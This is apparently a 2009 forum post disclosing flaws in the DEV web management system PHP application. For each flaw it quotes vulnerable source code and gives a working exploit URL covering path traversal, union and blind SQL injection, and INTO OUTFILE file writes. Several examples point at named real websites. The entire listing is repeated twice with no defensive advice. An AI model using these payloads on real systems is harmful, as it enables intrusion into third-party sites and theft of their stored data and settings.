AFoST
16.10.2009, 00:14
Продукт DEV web management system (dev-wms.sourceforge.net/)
========================
Directory reading
gallery.php
...
if ($ct) {
$dp=OpenDir ("$configuration->gallery_folder_url$ct/");
$i=0;
$configuration->thumbnail_spacing=floor($configuration->thumbnail_spacing/2);
while ($fname=ReadDir($dp)) {
...
http://dev/index.php?session=0&action=gallery&page=1&ct=wallpapers/../../
example: http://www.hornatorysa.com/index.php?session=0&action=gallery&page=1&ct=/../../../../../www/hornatorysa.com/public_html/
===========================
SQL-injection
determ_title.php
...
switch ($action) {
case "register";
$pagetitle="$configuration->site_name :: $language[AUTHOR_REGISTRATION]";
break;
case "add";
$pagetitle="$configuration->site_name :: $language[ADD_ARTICLE_INTO_SYSTEM]";
break;
case "read";
@$titlpart=mysql_fetch_array(mysql_query("SELECT nazov FROM prispevok1 WHERE id=$article"));
$pagetitle="$configuration->site_name :: $titlpart[nazov]";
break;
case "komentar";
@$titlpart=mysql_fetch_array(mysql_query("SELECT nazov FROM prispevok1 WHERE id=$article"));
$pagetitle="$configuration->site_name :: $titlpart[nazov] - $language[COMMENTS]";
break;
...
http://dev/?action=read&article=1+union+select+concat(name,0x3a,value%20)+ from+variables1+limit+2,1+--%20-
example: http://2pure.net/?action=read&article=1+union+select+concat(name,0x3a,value%20)+ from+variables1+limit+2,1+--%20-
=========================
SQL-injection
komentar.php
...
$prikaz="SELECT * FROM komentar1 WHERE article LIKE '".$article."' ORDER BY id DESC LIMIT ".($page-1)*$configuration->comments_boards_entries.",".$configuration->comments_boards_entries;
$total=mysql_fetch_row(mysql_query("SELECT count(id) FROM komentar1 WHERE article LIKE '$article'",$spojenie));
$vysledok=mysql_query ($prikaz,$spojenie);
...
http://dev/index.php?session=0&action=komentar&article=2+union+select+concat(name,0x3a,value%20)+ from+variables1+limit+2,1+/*
========================
SQL-injection
readtp.php
...
$prikaz="SELECT * FROM topic1 WHERE id=$id";
$vysledok=mysql_query ($prikaz,$spojenie);
$zaznam=mysql_fetch_array ($vysledok);
...
http://dev/index.php?action=readtp&id=1+union+select+1,concat(name,0x3a,value%20),3,4 ,5+from+variables1+limit+2,1+--%20-
==========================
SQL-injection blind
komentar.php
...
$enteredexist=mysql_fetch_array(mysql_query ("SELECT id FROM autor1 WHERE nickname like '$autor'", $spojenie));
...
http://dev/index.php?session=0&action=komentar&article=&autor=-1'+union+select+1+into+outfile+'c:/1.txt'+--%20-
==========================
SQL-injection blind
komentar.php
...
if ($spravit=="pridat") {
if ($autor=="" || $nazov=="" || $komentar =="") {
...
elseif (!mysql_fetch_array(mysql_query("SELECT id FROM prispevok1 WHERE id=$article",$spojenie))) {
echo ("<b><center>FATAL ERROR: ARTICLE NOT FOUND</center></b><br/><br/>");
}
...
http://dev/index.php?session=0&action=komentar&spravit=pridat&article=1+union+select+1+into+outfile+'c:/2.txt'+/*
=========================
SQL-injection blind
read.php
...
$prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".$article;
$xvysledok=mysql_query ($prikaz,$spojenie);
$xzaznam=mysql_fetch_array ($xvysledok);
...
http://dev/index.php?action=read&article=-1+or+5=(select+substring(version(),1,1))+--%20--
http://dev/index.php?action=read&article=-1+and+1=0+union+select+1,2,3,4,5+into+outfile+'c:/1.txt'--%20--
=========================
SQL-injection blind
send.php
...
$prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".$article;
$xvysledok=mysql_query ($prikaz,$spojenie);
...
http://dev/index.php?action=send&article=-1+or+5=(select+substring(version(),1,1))+--%20--
=========================
SQL-injection blind
fpasswd.php
...
if ($odoslane=="true" && $login!="") {
$login=trim ($login);
$prikaz="SELECT nickname, mail, heslo FROM autor1 WHERE nickname LIKE '".$login."'";
$vysledok=mysql_query($prikaz,$spojenie);
$zaznam=mysql_fetch_array($vysledok);
...
http://dev/index.php?action=forgot&odoslane=true&login='+or+5=(select+substring(version(),1,1))--%20-
========================
Directory reading
gallery.php
...
if ($ct) {
$dp=OpenDir ("$configuration->gallery_folder_url$ct/");
$i=0;
$configuration->thumbnail_spacing=floor($configuration->thumbnail_spacing/2);
while ($fname=ReadDir($dp)) {
...
http://dev/index.php?session=0&action=gallery&page=1&ct=wallpapers/../../
example: http://www.hornatorysa.com/index.php?session=0&action=gallery&page=1&ct=/../../../../../www/hornatorysa.com/public_html/
===========================
SQL-injection
determ_title.php
...
switch ($action) {
case "register";
$pagetitle="$configuration->site_name :: $language[AUTHOR_REGISTRATION]";
break;
case "add";
$pagetitle="$configuration->site_name :: $language[ADD_ARTICLE_INTO_SYSTEM]";
break;
case "read";
@$titlpart=mysql_fetch_array(mysql_query("SELECT nazov FROM prispevok1 WHERE id=$article"));
$pagetitle="$configuration->site_name :: $titlpart[nazov]";
break;
case "komentar";
@$titlpart=mysql_fetch_array(mysql_query("SELECT nazov FROM prispevok1 WHERE id=$article"));
$pagetitle="$configuration->site_name :: $titlpart[nazov] - $language[COMMENTS]";
break;
...
http://dev/?action=read&article=1+union+select+concat(name,0x3a,value%20)+ from+variables1+limit+2,1+--%20-
example: http://2pure.net/?action=read&article=1+union+select+concat(name,0x3a,value%20)+ from+variables1+limit+2,1+--%20-
=========================
SQL-injection
komentar.php
...
$prikaz="SELECT * FROM komentar1 WHERE article LIKE '".$article."' ORDER BY id DESC LIMIT ".($page-1)*$configuration->comments_boards_entries.",".$configuration->comments_boards_entries;
$total=mysql_fetch_row(mysql_query("SELECT count(id) FROM komentar1 WHERE article LIKE '$article'",$spojenie));
$vysledok=mysql_query ($prikaz,$spojenie);
...
http://dev/index.php?session=0&action=komentar&article=2+union+select+concat(name,0x3a,value%20)+ from+variables1+limit+2,1+/*
========================
SQL-injection
readtp.php
...
$prikaz="SELECT * FROM topic1 WHERE id=$id";
$vysledok=mysql_query ($prikaz,$spojenie);
$zaznam=mysql_fetch_array ($vysledok);
...
http://dev/index.php?action=readtp&id=1+union+select+1,concat(name,0x3a,value%20),3,4 ,5+from+variables1+limit+2,1+--%20-
==========================
SQL-injection blind
komentar.php
...
$enteredexist=mysql_fetch_array(mysql_query ("SELECT id FROM autor1 WHERE nickname like '$autor'", $spojenie));
...
http://dev/index.php?session=0&action=komentar&article=&autor=-1'+union+select+1+into+outfile+'c:/1.txt'+--%20-
==========================
SQL-injection blind
komentar.php
...
if ($spravit=="pridat") {
if ($autor=="" || $nazov=="" || $komentar =="") {
...
elseif (!mysql_fetch_array(mysql_query("SELECT id FROM prispevok1 WHERE id=$article",$spojenie))) {
echo ("<b><center>FATAL ERROR: ARTICLE NOT FOUND</center></b><br/><br/>");
}
...
http://dev/index.php?session=0&action=komentar&spravit=pridat&article=1+union+select+1+into+outfile+'c:/2.txt'+/*
=========================
SQL-injection blind
read.php
...
$prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".$article;
$xvysledok=mysql_query ($prikaz,$spojenie);
$xzaznam=mysql_fetch_array ($xvysledok);
...
http://dev/index.php?action=read&article=-1+or+5=(select+substring(version(),1,1))+--%20--
http://dev/index.php?action=read&article=-1+and+1=0+union+select+1,2,3,4,5+into+outfile+'c:/1.txt'--%20--
=========================
SQL-injection blind
send.php
...
$prikaz="SELECT hlasovalo, vysledok, znamka, id, autorid FROM prispevok1 WHERE id=".$article;
$xvysledok=mysql_query ($prikaz,$spojenie);
...
http://dev/index.php?action=send&article=-1+or+5=(select+substring(version(),1,1))+--%20--
=========================
SQL-injection blind
fpasswd.php
...
if ($odoslane=="true" && $login!="") {
$login=trim ($login);
$prikaz="SELECT nickname, mail, heslo FROM autor1 WHERE nickname LIKE '".$login."'";
$vysledok=mysql_query($prikaz,$spojenie);
$zaznam=mysql_fetch_array($vysledok);
...
http://dev/index.php?action=forgot&odoslane=true&login='+or+5=(select+substring(version(),1,1))--%20-